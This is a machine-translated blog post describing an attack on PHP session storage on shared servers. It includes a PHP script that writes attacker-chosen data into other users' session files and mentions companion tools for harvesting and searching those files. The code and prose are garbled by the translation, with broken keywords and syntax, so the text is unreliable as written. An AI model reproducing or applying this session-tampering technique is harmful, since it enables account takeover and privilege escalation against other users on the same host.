PHP session defects and management tools

Jianxin is Jianxin. The idea is really good. I wrote a program in the previous log to obtain session data of all the users on the server. He thought of the side note. Hey hey, that's right, it's just to modify the data read, I wrote another spam script to modify the data. The specific implementation is "Direct Reading => modifying data => submitting changes" and submitting the file_put_contents function in PHP, but I encountered a lot of trouble, that is, the difference between "_" and "_", but I just found that this attack is really dangerous...

Some codes for obtaining and modifying data are not published at the moment;
<? Php
Session_start ();
$ Path = ini_get (session. save_path );
Foreach ($ _ POST as $ sess_name => $ sess_data)
{
$ _ SESSION = $ sess_data;
$ Sess_data = session_encode;
File_put_contents ("$ path/$ sess_name", $ sess_data );
}
$ _ SESSION = array ();
Echo "Fuck OK! ";
?>

PHP server SESSION management tool

My floor was disconnected two days ago, so I couldn't do anything. I just saw an article about session penetration written by a mad dog in my blog. The article was very simple. In the end, the mad dog "stingy" didn't send out the application, so no matter whether it is used or not, I wrote it down first. because you cannot check the information, you have to read this Manual. The Code may still have defects in many aspects. the most annoying problem is the regular expression and file stream operations. It loops through the loop to confuse all my headers, debugging takes a whole day (it's hard to write code ). I hope you will give more comments .. mad Dog chapter: http://www.loveshell.net/blog/blogview.asp? LogID = 101

After writing the program, I conducted a rough test on the execution efficiency of the program.
Execution Environment: winxp, PHP5, apache2, core 2050--1.6GHZ, 512m memory, 945 Motherboard
File System: 6-layer directory with 1000 files per layer. The session file is about 50-bytes.
Searching for these 6000 files takes about 10-15 seconds, and the efficiency is not as low as I think.

Download